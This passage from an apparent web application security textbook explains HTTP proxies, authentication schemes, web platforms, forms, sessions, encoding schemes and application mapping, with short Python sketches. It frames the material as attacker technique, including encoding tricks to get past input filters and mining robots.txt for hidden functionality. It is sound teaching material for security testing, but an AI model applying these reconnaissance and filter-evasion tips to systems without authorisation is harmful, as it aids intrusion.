being used, which you should be aware of:

■■

When a browser issues an HTTP request to a proxy server, it places the

full URL into the request, including the protocol prefix

http:// and the

hostname of the server. The proxy server extracts the hostname and

uses this to direct the request to the correct destination web server.

■■

When HTTPS is being used, the browser cannot perform the SSL hand-

shake with the proxy server, as this would break the secure tunnel and

leave the communications vulnerable to interception attacks. Hence, the

browser must use the proxy as a pure TCP-level relay, which passes all

network data in both directions between the browser and the destina-

tion web server, with which the browser performs an SSL handshake as

normal. To establish this relay, the browser makes an HTTP request to

the proxy server using the

CONNECT method and specifying the destina-

tion hostname and port number as the URL. If the proxy allows the

request, it returns an HTTP response with a 200 status, keeps the TCP

connection open, and from that point onwards acts as a pure TCP-level

relay to the destination web server.
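The two differences just described show up in the first line of the request that the browser sends to the proxy. The following sketch produces that line for a given URL. The function name proxy_request_line is hypothetical, and the sketch considers only GET requests and the default ports of the two protocols.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def proxy_request_line(url: str) -> str:
    """Return the first line a browser would send to a proxy for this URL."""
    parts = urlsplit(url)
    if parts.scheme == "https":
        # For HTTPS, ask the proxy to open a TCP-level relay to host:port.
        port = parts.port or DEFAULT_PORTS["https"]
        return f"CONNECT {parts.hostname}:{port} HTTP/1.1"
    # For plain HTTP, send the full URL, including protocol and hostname.
    return f"GET {url} HTTP/1.1"


plain = proxy_request_line("http://wahh-app.com/books/search.asp?q=wahh")
secure = proxy_request_line("https://wahh-app.com/books/search.asp?q=wahh")
```

In the HTTPS case, the proxy sees only the destination hostname and port; the path and query string are sent later, inside the tunnel.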

By some measure, the most useful item in your toolkit when attacking web

applications is a specialized kind of proxy server that sits between your

browser and the target web site and allows you to intercept and modify all

requests and responses, even those using HTTPS. We will begin examining

how you can use this kind of tool in the next chapter.

HTTP Authentication

The HTTP protocol includes its own mechanisms for authenticating users,

using various authentication schemes, including:

■■

Basic — This is a very simple authentication mechanism that sends

user credentials as a Base64-encoded string in a request header with

each message.

■■

NTLM — This is a challenge-response mechanism and uses a version of

the Windows NTLM protocol.

■■

Digest — This is a challenge-response mechanism and uses MD5

checksums of a nonce with the user’s credentials.

It is relatively rare to encounter these authentication protocols being used by

web applications deployed on the Internet, although they are more commonly

used within organizations to access intranet-based services.
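Basic authentication is simple enough to reproduce in a few lines, which also makes clear that Base64 is an encoding and not encryption. In the sketch below, the function names and the credentials user and pass are illustrative assumptions.

```python
import base64


def basic_auth_header(username: str, password: str) -> str:
    """Build the Authorization header used by Basic authentication."""
    credentials = f"{username}:{password}".encode("utf-8")
    token = base64.b64encode(credentials).decode("ascii")
    return f"Authorization: Basic {token}"


def decode_basic(header_value: str):
    """Recover the credentials from the value of an Authorization header."""
    _scheme, _, token = header_value.partition(" ")
    decoded = base64.b64decode(token).decode("utf-8")
    # Only the first colon separates the username from the password.
    username, _, password = decoded.partition(":")
    return username, password


header = basic_auth_header("user", "pass")
recovered = decode_basic("Basic dXNlcjpwYXNz")
```

Anyone who can read the request can reverse the encoding in this way, so the confidentiality of the credentials depends entirely on the transport.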

COMMON MYTH “Basic authentication is insecure.”

Basic authentication places credentials in unencrypted form within the HTTP

request, and so it is frequently stated that the protocol is insecure and should

not be used. But forms-based authentication, as used by numerous banks, also

places credentials in unencrypted form within the HTTP request.

Any HTTP message can be protected from eavesdropping attacks by

using HTTPS as a transport mechanism, which should be done by every

security-conscious application. In relation to eavesdropping at least, basic

authentication is in itself no worse than the methods used by the majority of

today’s web applications.

Web Functionality

In addition to the core communications protocol used to send messages

between client and server, web applications employ numerous different tech-

nologies to deliver their functionality. Any reasonably functional application

may employ dozens of distinct technologies within its server and client com-

ponents. Before you can mount a serious attack against a web application, you

need a basic understanding of how its functionality is implemented, how the

technologies used are designed to behave, and where their weak points are

likely to lie.

Server-Side Functionality

The early World Wide Web contained entirely static content. Web sites con-

sisted of various resources such as HTML pages and images, which were sim-

ply loaded onto a web server and delivered to any user who requested them.

Each time a particular resource was requested, the server responded with the

same content.

Today’s web applications still typically employ a fair number of static

resources. However, a large amount of the content that they present to users is

generated dynamically. When a user requests a dynamic resource, the server’s

response is created on the fly, and each user may receive content that is

uniquely customized for them.

Dynamic content is generated by scripts or other code executing on the

server. These scripts are akin to computer programs in their own right — they

have various inputs, perform processing on these, and return their outputs to

the user.

When a user’s browser makes a request for a dynamic resource, it does not

normally simply ask for a copy of that resource. In general, it will also submit

various parameters along with its request. It is these parameters that enable

the server-side application to generate content that is tailored to the individual

user. There are three main ways in which HTTP requests can be used to send

parameters to the application:

■■

In the URL query string.

■■

In HTTP cookies.

■■

In the body of requests using the POST method.

In addition to these primary sources of input, the server-side application

may in principle use any part of the HTTP request as an input to its processing.

For example, an application may process the

User-Agent header to generate

content that is optimized for the type of browser being used.
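The three main channels for parameters can be pulled out of a single request as follows. This is a sketch under stated assumptions: collect_parameters is a hypothetical name, the sample request (including the /books/order.asp path and its parameters) is invented for illustration, and the body is assumed to be URL-encoded form data.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def collect_parameters(raw: str) -> dict:
    """Gather parameters from the query string, cookies, and POST body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, url, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = SimpleCookie()
    cookies.load(headers.get("cookie", ""))
    return {
        "query": parse_qs(urlsplit(url).query),
        "cookies": {name: morsel.value for name, morsel in cookies.items()},
        "body": parse_qs(body) if method == "POST" else {},
    }


raw_request = (
    "POST /books/order.asp?id=42 HTTP/1.1\r\n"
    "Host: wahh-app.com\r\n"
    "Cookie: lang=en\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 16\r\n"
    "\r\n"
    "qty=2&title=wahh"
)
params = collect_parameters(raw_request)
```

Every value collected here is under the control of whoever sends the request, which is why all three channels need to be examined when mapping an application's inputs.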

Like computer software in general, web applications employ a wide range

of technologies on the server side to deliver their functionality. These include:

■■

Scripting languages such as PHP, VBScript, and Perl.

■■

Web application platforms such as ASP.NET and Java.

■■

Web servers such as Apache, IIS, and Netscape Enterprise.

■■

Databases such as MS-SQL, Oracle, and MySQL.

■■

Other back-end components such as file systems, SOAP-based web ser-

vices, and directory services.

All of these technologies and the types of vulnerabilities that can arise in

relation to them will be examined in detail throughout this book. Some of the

most common web application platforms and languages you are likely to

encounter are described in the following sections.

The Java Platform

For several years, the Java Platform, Enterprise Edition (formerly known as

J2EE) has been a de facto standard for large-scale enterprise applications.

Developed by Sun Microsystems, it lends itself to multi-tiered and load-bal-

anced architectures, and is well suited to modular development and code

reuse. Because of its long history and widespread adoption, there are many

high-quality development tools, application servers, and frameworks avail-

able to assist developers. The Java Platform can be run on several underlying

operating systems, including Windows, Linux, and Solaris.

Descriptions of Java-based web applications often employ a number of

potentially confusing terms that you may need to be aware of:

■■

An Enterprise Java Bean (EJB) is a relatively heavyweight software

component that encapsulates the logic of a specific business function

within the application. EJBs are intended to take care of various techni-

cal challenges that application developers must address, such as trans-

actional integrity.

■■

A Plain Old Java Object (POJO) is an ordinary Java object, as distinct

from a special object like an EJB. POJO is normally used to denote

objects that are user-defined and much simpler and more lightweight

than EJBs and those used in other frameworks.

■■

A Java Servlet is an object that resides on an application server and

receives HTTP requests from clients and returns HTTP responses. There

are numerous useful interfaces that Servlet implementations can use to

facilitate the development of useful applications.

■■

A Java web container is a platform or engine that provides a runtime

environment for Java-based web applications. Examples of Java web

containers are Apache Tomcat, BEA WebLogic, and JBoss.

Many Java web applications employ third-party and open source compo-

nents alongside custom-built code. This is an attractive option because it

reduces development effort, and Java is well-suited to this modular approach.

Examples of components commonly used for key application functions are:

■■

Authentication — JAAS, ACEGI

■■

Presentation layer — SiteMesh, Tapestry

■■

Database object relational mapping — Hibernate

■■

Logging — Log4J

If you can determine which open source packages are used in the applica-

tion you are attacking, you can download these and perform a code review or

install them to experiment on. A vulnerability in any of these may be

exploitable to compromise the wider application.

ASP.NET

ASP.NET is Microsoft’s web application framework and is a direct competitor

to the Java Platform. ASP.NET is several years younger than its counterpart

but has made some inroads into Java’s territory.

ASP.NET uses Microsoft’s .NET Framework, which provides a virtual

machine (the Common Language Runtime) and a set of powerful APIs. Hence,

ASP.NET applications can be written in any .NET language, such as C# or

VB.NET.

ASP.NET lends itself to the event-driven programming paradigm which is

normally used in conventional desktop software, rather than the script-based

approach used in most earlier web application frameworks. This, together

with the powerful development tools provided with Visual Studio, makes

developing a functional web application extremely easy for anyone with min-

imal programming skills.

The ASP.NET framework helps to protect against some common web appli-

cation vulnerabilities such as cross-site scripting, without requiring any effort by

the developer. However, one practical downside of its apparent simplicity is that

many small-scale ASP.NET applications are actually created by beginners who

lack any awareness of the core security problems faced by web applications.

PHP

The PHP language emerged out of a hobby project (the acronym originally

stood for personal home page). It has since evolved almost unrecognizably

into a highly powerful and rich framework for developing web applications. It

is often used in conjunction with other free technologies in what is known as

the LAMP stack (comprising Linux, Apache, MySQL, and PHP).

Numerous open source applications and components have been developed

using PHP. Many of these provide off-the-shelf solutions for common applica-

tion functions, which are often incorporated into wider custom-built applica-

tions, for example:

■ Bulletin boards: PHPBB, PHP-Nuke
■ Administrative front ends: PHPMyAdmin
■ Web mail: SquirrelMail, IlohaMail
■ Photo galleries: Gallery

■ Shopping carts: osCommerce, ECW-Shop
■ Wikis: MediaWiki, WakkaWiki

Because PHP is free and easy to use, it has often been the language of choice

for many beginners writing web applications. Further, the design and default

configuration of the PHP framework have historically made it easy for programmers

to unwittingly introduce security bugs into their code. These factors

have meant that applications written in PHP have suffered from a dispropor-

tionate number of security vulnerabilities. In addition to this, several defects

have existed within the PHP platform itself, which could often be exploited via

applications running on it. See Chapter 18 for details of common defects aris-

ing in PHP applications.

Client-Side Functionality

In order for the server-side application to receive user input and actions, and

present the results of these back to the user, it needs to provide a client-side

user interface. Because all web applications are accessed via a web browser,

these interfaces all share a common core of technologies. However, these have

been built upon in various diverse ways, and the ways in which applications

leverage client-side technology have continued to evolve rapidly in recent

years.

HTML

The core technology used to build web interfaces is the hypertext markup lan-

guage (HTML). This is a tag-based language that is used to describe the struc-

ture of documents that are rendered within the browser. From its simple

beginnings as a means of providing basic formatting to text documents,

HTML has developed into a rich and powerful language that can be used to

create highly complex and functional user interfaces.

Hyperlinks

A large amount of communication from client to server is driven by the user

clicking on hyperlinks. In web applications, hyperlinks frequently contain pre-

set request parameters. These are items of data which are never entered by the

user but which are submitted because the server placed them into the target

URL of the hyperlink on which the user clicks. For example, a web application

might present a series of links to news stories, each having the following form:

<a href="/news/showStory?newsid=19371130&lang=en">...</a>

When a user clicks on this link, the browser makes the following request:

GET /news/showStory?newsid=19371130&lang=en HTTP/1.1

Host: wahh-app.com

...

The server receives the two parameters in the query string (newsid and

lang) and uses their values to determine what content should be presented to

the user.
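
As a rough illustration of what the server does with such a request, the following Python sketch splits the example request target into its path and its query string parameters. It uses only the standard library; a real application framework would normally do this parsing itself.

```python
from urllib.parse import urlsplit, parse_qs

# Request target taken from the example request above.
target = "/news/showStory?newsid=19371130&lang=en"

parts = urlsplit(target)
params = parse_qs(parts.query)  # maps each parameter name to a list of values

print(parts.path)  # the resource being requested
print(params)      # the preset parameters that the server placed in the link
```

Because the parameters travel in the URL, anyone who can edit the URL can change them, whether or not the user ever typed them.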

Forms

While hyperlink-based navigation is responsible for the majority of client-to-

server communications, in most web applications there is a need for more flex-

ible ways of gathering input and receiving actions from users. HTML forms

are the usual mechanism for allowing users to enter arbitrary input via their

browser. A typical form is as follows:

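<form action="/secure/login.php?app=quotations" method="post">
username: <input type="text" name="username"><br>
password: <input type="password" name="password">
<input type="hidden" name="redir" value="/secure/home.php">
<input type="submit" name="submit" value="log in">
</form>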

When the user enters values into the form and clicks the submit button, the

browser makes a request like the following:

POST /secure/login.php?app=quotations HTTP/1.1

Host: wahh-app.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 62

Cookie: SESS=GTnrpx2ss2tSWSnhXJGyG0LJ47MXRsjcFM6Bd

username=daf&password=foo&redir=/secure/home.php&submit=log+in

In this request, there are several points of interest reflecting how different

aspects of the request are used to control server-side processing:

■ Because the HTML form tag contained an attribute specifying the POST
method, the browser uses this method to submit the form, and places
the data from the form into the body of the request message.

■ In addition to the two items of data entered by the user, the form
contains a hidden parameter (redir) and a submit parameter (submit).
Both of these are submitted in the request and may be used by the
server-side application to control its logic.

■ The target URL for the form submission contains a preset parameter
(app), as in the hyperlink example shown previously. This parameter
may be used to control the server-side processing.

■ The request contains a cookie parameter (SESS), which was issued to
the browser in an earlier response from the server. This parameter may
be used to control the server-side processing.
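
The message body of the request above can be reproduced with a short Python sketch. It is only an approximation of what a browser does: the field list is copied from the example, and `safe="/"` is an assumption made here so that the slashes in the redir value stay unencoded, as they appear in the example.

```python
from urllib.parse import urlencode

# Field names and values taken from the example request above.
fields = [
    ("username", "daf"),
    ("password", "foo"),
    ("redir", "/secure/home.php"),
    ("submit", "log in"),
]

# Build the name=value pairs joined by "&"; a space is encoded as "+".
body = urlencode(fields, safe="/")

# The Content-Length header carries the length of the body in bytes.
content_length = len(body.encode("ascii"))

print(body)
print(content_length)
```

When you modify a request body by hand, the Content-Length header needs to be recalculated in the same way, a task that intercepting proxies usually perform for you.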

The previous request contains a header specifying that the type of content in
the message body is x-www-form-urlencoded. This means that parameters are
represented in the message body as name/value pairs in the same way as they
are in the URL query string. The other content type you are likely to encounter
when form data is submitted is multipart/form-data. An application can
request that browsers use multipart encoding by specifying this in an enctype
attribute in the form tag. With this form of encoding, the Content-Type header
in the request will also specify a random string that is used as a separator for
the parameters contained in the request body. For example, if the form
specified multipart encoding, the resulting request would look like the following:

POST /secure/login.php?app=quotations HTTP/1.1
Host: wahh-app.com
Content-Type: multipart/form-data; boundary=------------7d71385d0a1a
Content-Length: 369
Cookie: SESS=GTnrpx2ss2tSWSnhXJGyG0LJ47MXRsjcFM6Bd

------------7d71385d0a1a
Content-Disposition: form-data; name="username"

daf
------------7d71385d0a1a
Content-Disposition: form-data; name="password"

foo
------------7d71385d0a1a
Content-Disposition: form-data; name="redir"

/secure/home.php
------------7d71385d0a1a
Content-Disposition: form-data; name="submit"

log in
------------7d71385d0a1a--

JavaScript

Hyperlinks and forms can be used to create a rich user interface capable of eas-

ily gathering most kinds of input which web applications require. However,

most applications employ a more distributed model, in which the client side is

used not simply to submit user data and actions but also to perform actual pro-

cessing of data. This is done for two primary reasons:

■ It can improve the application’s performance, because certain tasks can
be carried out entirely on the client component, without needing to
make a round trip of request and response to the server.

■ It can enhance usability, because parts of the user interface can be
dynamically updated in response to user actions, without needing to
load an entirely new HTML page delivered by the server.

JavaScript is a relatively simple but powerful programming language that

can be easily used to extend web interfaces in ways that are not possible using

HTML alone. It is commonly used to perform the following tasks:

■ Validating user-entered data before this is submitted to the server, to
avoid unnecessary requests if the data contains errors.

■ Dynamically modifying the user interface in response to user actions;
for example, to implement drop-down menus and other controls
familiar from non-web interfaces.

■ Querying and updating the document object model (DOM) within the
browser to control the browser’s behavior.

A significant development in the use of JavaScript has been the appearance

of AJAX techniques for creating a smoother user experience which is closer to

that provided by traditional desktop applications. AJAX (or Asynchronous

JavaScript and XML) involves issuing dynamic HTTP requests from within an

HTML page, to exchange data with the server and update the current web

page accordingly, without loading a new page altogether. These techniques

can provide very rich and satisfying user interfaces. They can also sometimes

be used by attackers to powerful effect, and may introduce vulnerabilities of

their own if not carefully implemented (see Chapter 12).

Thick Client Components

Going beyond the capabilities of JavaScript, some web applications employ

thicker client technologies that use custom binary code to extend the browser’s

built-in capabilities in arbitrary ways. These components may be deployed as

bytecode that is executed by a suitable browser plug-in, or may involve

installing native executables onto the client computer itself. The thick-client

technologies you are likely to encounter when attacking web applications are:

■ Java applets
■ ActiveX controls
■ Shockwave Flash objects

These technologies are described in detail in Chapter 5.

State and Sessions

The technologies described so far enable the server and client components of a

web application to exchange and process data in numerous ways. To imple-

ment most kinds of useful functionality, however, applications need to track

the state of each user’s interaction with the application across multiple

requests. For example, a shopping application may allow users to browse a

product catalogue, add items to a cart, view and update the cart contents, pro-

ceed to checkout, and provide personal and payment details.

To make this kind of functionality possible, the application must maintain a

set of stateful data generated by the user’s actions across several requests. This

data is normally held within a server-side structure called a session. When a

user performs an action, such as adding an item to her shopping cart, the

server-side application updates the relevant details within the user’s session.

When the user later views the contents of her cart, data from the session is

used to return the correct information to the user.

In some applications, state information is stored on the client component

rather than the server. The current set of data is passed to the client in each

server response, and is sent back to the server in each client request. Of course,

because any data transmitted via the client component may be modified by the

user, applications need to take measures to protect themselves from attackers

who may change this state information in an attempt to interfere with the

application’s logic. The ASP.NET platform makes use of a hidden form field

called the ViewState to store state information about the user’s web interface

and so reduce overhead on the server. By default, the contents of the ViewState

include a keyed hash to prevent tampering.
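
The general idea of protecting client-held state with a keyed hash can be sketched in Python as follows. This is not the ViewState format or ASP.NET's actual algorithm; the key, the separator, and the function names are hypothetical and chosen only for illustration.

```python
import hashlib
import hmac

# Assumption: a secret known only to the server (hypothetical value).
SECRET_KEY = b"hypothetical-server-side-key"


def protect(state: bytes) -> bytes:
    """Append a keyed hash (HMAC-SHA256) to state that will be sent to the client."""
    tag = hmac.new(SECRET_KEY, state, hashlib.sha256).hexdigest().encode("ascii")
    return state + b"." + tag


def verify(blob: bytes) -> bytes:
    """Return the state if its keyed hash is valid; raise ValueError otherwise."""
    state, sep, tag = blob.rpartition(b".")
    expected = hmac.new(SECRET_KEY, state, hashlib.sha256).hexdigest().encode("ascii")
    if not sep or not hmac.compare_digest(tag, expected):
        raise ValueError("state has been modified")
    return state


blob = protect(b"cart=3")
print(verify(blob))  # the unmodified state is accepted
```

A user who changes the state without knowing the key cannot produce a matching hash, so the server can detect the modification. The state itself remains readable by the client unless it is also encrypted.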

Because the HTTP protocol is itself stateless, most applications need a

means of re-identifying individual users across multiple requests, in order for

the correct set of state data to be used to process each request. This is normally

achieved by issuing each user a token which uniquely identifies that user’s

session. These tokens may be transmitted using any type of request parameter,

but HTTP cookies are used by most applications. Several kinds of vulnerabil-

ity arise in relation to session handling, and these are described in detail in

Chapter 7.
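
A minimal sketch of server-side sessions, assuming an in-memory dictionary as the session store and a hypothetical shopping cart as the state, might look like this in Python. Real platforms add expiry, persistence, and cookie handling on top of the same idea.

```python
import secrets

# Server-side store: session token -> that user's state (hypothetical layout).
sessions = {}


def create_session() -> str:
    """Issue an unpredictable token and create empty state for it."""
    token = secrets.token_urlsafe(32)
    sessions[token] = {"cart": []}
    return token


def add_to_cart(token: str, item: str) -> None:
    """Update the state belonging to whichever session the token identifies."""
    sessions[token]["cart"].append(item)


alice = create_session()
bob = create_session()
add_to_cart(alice, "book")
print(sessions[alice]["cart"], sessions[bob]["cart"])
```

The token is the only thing that ties a request to its state, which is why its unpredictability and confidentiality matter so much.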

Encoding Schemes

Web applications employ several different encoding schemes for their data.

Both the HTTP protocol and the HTML language are historically text-based,

and different encoding schemes have been devised to ensure that unusual

characters and binary data can be safely handled by these mechanisms. When

you are attacking a web application, you will frequently need to encode data

using a relevant scheme to ensure that it is handled in the way you intend. Fur-

ther, in many cases you may be able to manipulate the encoding schemes used

by an application to cause behavior that its designers did not intend.

URL Encoding

URLs are permitted to contain only the printable characters in the US-ASCII

character set — that is, those whose ASCII code is in the range 0x20–0x7e

inclusive. Further, several characters within this range are restricted because

they have special meaning within the URL scheme itself or within the HTTP

protocol.

The URL encoding scheme is used to encode any problematic characters

within the extended ASCII character set so that they can be safely transported

over HTTP. The URL-encoded form of any character is the

% prefix followed by

the character’s two-digit ASCII code expressed in hexadecimal. Some exam-

ples of characters that are commonly URL-encoded are shown here:

%3d =

%25 %

%20 space

%0a new line

%00 null byte

A further encoding to be aware of is the + character, which represents a URL-

encoded space (in addition to the

%20 representation of a space).

NOTE For the purpose of attacking web applications, you should URL-encode

any of the following characters when you are inserting them as data into an

HTTP request:

space % ? & = ; + #

(Of course, you will often need to use these characters with their special

meaning when modifying a request — for example, to add an additional request

parameter to the query string. In this case, they should be used in their literal

form.)
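
The encodings described above can be tried out with Python's standard library. This is only a convenience sketch; note that Python emits uppercase hexadecimal digits, which are equivalent to the lowercase forms shown earlier.

```python
from urllib.parse import quote, quote_plus, unquote, unquote_plus

data = "a=b&c d"

# Encode every character that has special meaning, so the value is treated as data.
encoded = quote(data, safe="")
# The same, but with a space represented as "+" rather than "%20".
encoded_plus = quote_plus(data)

print(encoded)
print(encoded_plus)

# Decoding reverses the process; unquote_plus also turns "+" back into a space.
print(repr(unquote("%3d%25%20")))
print(repr(unquote_plus("log+in")))
```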

Unicode Encoding

Unicode is a character encoding standard that is designed to support all of the

writing systems used in the world. It employs various encoding schemes, some

of which can be used to represent unusual characters in web applications.

16-bit Unicode encoding works in a similar way to URL-encoding. For

transmission over HTTP, the 16-bit Unicode-encoded form of a character is the

%u prefix followed by the character’s Unicode code point expressed in hexa-

decimal. For example:

%u2215 ∕

%u00e9 é

UTF-8 is a variable-length encoding standard that employs one or more

bytes to express each character. For transmission over HTTP, the UTF-8

encoded form of a multi-byte character simply uses each byte expressed in

hexadecimal and preceded by the

% prefix. For example:

%c2%a9 ©

%e2%89%a0 ≠

For the purpose of attacking web applications, Unicode encoding is primar-

ily of interest because it can sometimes be used to defeat input validation

mechanisms. If an input filter blocks certain malicious expressions, but the

component that subsequently processes the input understands Unicode

encoding, then it may be possible to bypass the filter using various standard

and malformed Unicode encodings.
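
Both forms can be generated with a few lines of Python. The UTF-8 form comes straight from the standard library; the %u form is not produced by any standard library function, so `percent_u` below is a hypothetical helper written for this sketch, and it handles only characters whose code point fits in 16 bits.

```python
from urllib.parse import quote, unquote


def percent_u(ch: str) -> str:
    """Hypothetical helper: the %u form of a single 16-bit character."""
    code_point = ord(ch)
    if code_point > 0xFFFF:
        raise ValueError("character does not fit in 16 bits")
    return "%u{:04x}".format(code_point)


# UTF-8 form: each byte of the encoded character is percent-encoded.
print(quote("\u00a9"))      # copyright sign
print(quote("\u2260"))      # not-equal sign

# 16-bit form: %u followed by the code point in hexadecimal.
print(percent_u("\u00e9"))  # e with acute accent
print(percent_u("\u2215"))  # division slash
```

When testing a filter, the useful question is whether the component behind it decodes a form that the filter itself does not recognize.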

HTML Encoding

HTML encoding is a scheme used to represent problematic characters so that

they can be safely incorporated into an HTML document. Various characters

have special meaning as meta-characters within HTML and are used to define

the structure of a document rather than its content. To use these characters

safely as part of the document’s content, it is necessary to HTML-encode them.

HTML encoding defines numerous HTML entities to represent specific literal
characters, for example:

&quot; "
&apos; '
&amp; &
&lt; <
&gt; >

In addition, any character can be HTML-encoded using its ASCII code in
decimal form, for example:

&#34; "
&#39; '

or by using its ASCII code in hexadecimal form (prefixed by an x), for example:

&#x22; "
&#x27; '

When you are attacking a web application, your main interest in HTML

encoding is likely to be when probing for cross-site scripting vulnerabilities. If

an application returns user input unmodified within its responses, then it is

probably vulnerable, whereas if dangerous characters are HTML-encoded

then it is probably safe. See Chapter 12 for more details of these vulnerabilities.
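
As a quick way to see the encoding in action, the following Python sketch encodes a sample string with the standard library and decodes the named, decimal, and hexadecimal forms of the same character. The sample input is made up for illustration.

```python
import html

# Hypothetical user input containing HTML meta-characters.
user_input = '<script>alert("x")</script>'

# Encode the meta-characters so the browser treats them as content.
encoded = html.escape(user_input)
print(encoded)

# The named, decimal, and hexadecimal forms all decode to the same character.
print(html.unescape("&quot; &#34; &#x22;"))
```

If the encoded form appears in an application's response where you submitted the raw string, the application is encoding your input at that location.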

Base64 Encoding

Base64 encoding allows any binary data to be safely represented using only

printable ASCII characters. It is commonly used for encoding email attach-

ments for safe transmission over SMTP, and is also used to encode user cre-

dentials in basic HTTP authentication.

Base64 encoding processes input data in blocks of three bytes. Each of these

blocks is divided into four chunks of six bits each. Six bits of data allow for 64

different possible values, and so each chunk can be represented using a

set of 64 characters. Base64 encoding employs the following character set,

which contains only printable ASCII characters:

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

If the final block of input data contains fewer than three bytes, and so yields

fewer than four chunks of output data, then the output is padded with one or two

= characters.

For example, the Base64-encoded form of The Web Application Hacker’s Hand-

book is:

VGhlIFdlYiBBcHBsaWNhdGlvbiBIYWNrZXIncyBIYW5kYm9vaw==

Many web applications make use of Base64 encoding for transmitting

binary data within cookies and other parameters, and even for obfuscating

sensitive data to prevent trivial modification. You should always look out for,

and decode, any Base64 data that is issued to the client. Base64-encoded

strings can often be easily recognized from their specific character set and the

presence of padding characters at the end of the string.
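
The example above, and the effect of padding, can be checked with Python's standard library. The title is written with a plain ASCII apostrophe, which is what the encoded string shown earlier corresponds to.

```python
import base64

title = b"The Web Application Hacker's Handbook"
encoded = base64.b64encode(title).decode("ascii")
print(encoded)

# Padding depends on how many bytes are left over in the final block.
for sample in (b"d", b"da", b"daf"):
    print(sample, base64.b64encode(sample).decode("ascii"))

# Decoding any Base64 data issued by an application is equally simple.
print(base64.b64decode(encoded))
```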

Hex Encoding

Many applications use straightforward hexadecimal encoding when transmit-

ting binary data, using ASCII characters to represent the hexadecimal block.

For example, hex-encoding the username “daf” within a cookie would result in:

646166

As with Base64, hex-encoded data is usually easy to spot, and you should

always attempt to decode any such data that the server sends to the client, to

understand its function.
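
Hex encoding and decoding are one-liners in Python, as this short sketch of the example above shows:

```python
# Hex-encode the username from the example above, then decode it again.
username = b"daf"
hex_encoded = username.hex()
print(hex_encoded)

decoded = bytes.fromhex(hex_encoded)
print(decoded)
```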

Next Steps

So far, we have described the current state of web application (in)security,

examined the core mechanisms by which web applications can defend them-

selves, and taken a brief look at the key technologies employed in today’s

applications. With this groundwork in place, we are now in a position to start

looking at the actual practicalities of attacking web applications.

In any attack, your first task is to map the target application’s content and

functionality, to establish how it functions, how it attempts to defend itself,

and what technologies it uses. The next chapter examines this mapping

process in detail and shows how you can use it to obtain a deep understand-

ing of an application’s attack surface that will prove vital when it comes to

finding and exploiting security flaws within your target.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. What is the OPTIONS method used for?

2. What are the If-Modified-Since and If-None-Match headers used for?
Why might you be interested in these when attacking an application?

3. What is the significance of the secure flag when a server sets a cookie?

4. What is the difference between the common status codes 301 and 302?

5. How does a browser interoperate with a web proxy when SSL is being
used?

CHAPTER 4

Mapping the Application

The first step in the process of attacking an application is to gather and
examine some key information about it, in order to gain a better understanding
of what you are up against.

The mapping exercise begins by enumerating the application’s content and
functionality, in order to understand what the application actually does and
how it behaves. Much of this functionality will be easy to identify, but some of
it may be hidden away, and require a degree of guesswork and luck in order to
discover.

Having assembled a catalogue of the application’s functionality, the principal
task is to closely examine every aspect of its behavior, its core security
mechanisms, and the technologies being employed (on both client and server).
This will enable you to identify the key attack surface that the application
exposes and hence the most interesting areas on which to target subsequent
probing to find exploitable vulnerabilities.

In this chapter, we will describe the practical steps you need to follow during
application mapping, various techniques and tricks you can use to maximize
its effectiveness, and some tools that can assist you in the process.

Enumerating Content and Functionality

In a typical application, the majority of the content and functionality can be

identified via manual browsing. The basic approach is to walk through the

application starting from the main initial page, following every link and navi-

gating through all multistage functions (such as user registration or password

resetting). If the application contains a “site map,” this can provide a useful

starting point for enumerating content.

However, to perform a rigorous inspection of the enumerated content, and

to obtain a comprehensive record of everything identified, it is necessary to

employ some more advanced techniques than simple browsing.

Web Spidering

Various tools exist which perform automated spidering of web sites. These

tools work by requesting a web page, parsing it for links to other content,

and then requesting these, continuing recursively until no new content is

discovered.
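
The core loop of such a tool can be sketched in a few lines of Python. To keep the sketch self-contained, it crawls a hypothetical in-memory site (`SITE`) rather than making network requests, and it makes no attempt to stay within one host or to handle forms; `fetch` stands in for whatever function retrieves a page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class LinkParser(HTMLParser):
    """Collects the href value of every anchor tag in a page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def spider(start, fetch):
    """Request a page, parse it for links, and repeat until nothing new appears."""
    seen = {start}
    queue = [start]
    while queue:
        url = queue.pop(0)
        page = fetch(url)  # returns the HTML as a string, or None if unavailable
        if page is None:
            continue
        parser = LinkParser()
        parser.feed(page)
        for href in parser.links:
            target = urljoin(url, href)  # resolve relative links
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return seen


# Hypothetical site used in place of real HTTP requests.
SITE = {
    "http://wahh-app.com/": '<a href="/news">News</a> <a href="/login">Log in</a>',
    "http://wahh-app.com/news": '<a href="/news/showStory?newsid=1">Story</a> <a href="/">Home</a>',
}

found = spider("http://wahh-app.com/", SITE.get)
print(sorted(found))
```

The set of URLs already seen is what stops the loop, which is also why content that is not identified by a unique URL causes trouble for this approach.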

Building on this basic function, web application spiders attempt to achieve

a higher level of coverage by also parsing HTML forms and submitting these

back to the application using various preset or random values. This can enable

them to walk through multistage functionality, and to follow forms-based nav-

igation (e.g., where drop-down lists are used as content menus). Some tools

also perform some parsing of client-side JavaScript to extract URLs pointing to

further content. The following free tools all do a decent job of enumerating

application content and functionality (see Chapter 19 for a detailed analysis of

their capabilities):

■ Paros
■ Burp Spider (part of Burp Suite)
■ WebScarab

Figure 4-1 shows the results of using Burp Spider to map part of an application.

TIP Many web servers contain a file named robots.txt in the web root,

which contains a list of URLs that the site does not wish web spiders to visit or

search engines to index. Sometimes, this file contains references to sensitive

functionality, which you are certainly interested in spidering. Some spidering

tools designed for attacking web applications will check for the robots.txt

file and use all URLs within it as seeds in the spidering process.
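
Turning a robots.txt file into spidering seeds might be sketched as follows in Python. The sample file contents and the function name are made up for illustration, and the sketch ignores wildcard patterns and per-agent rules.

```python
from urllib.parse import urljoin


def robots_seeds(base_url, robots_txt):
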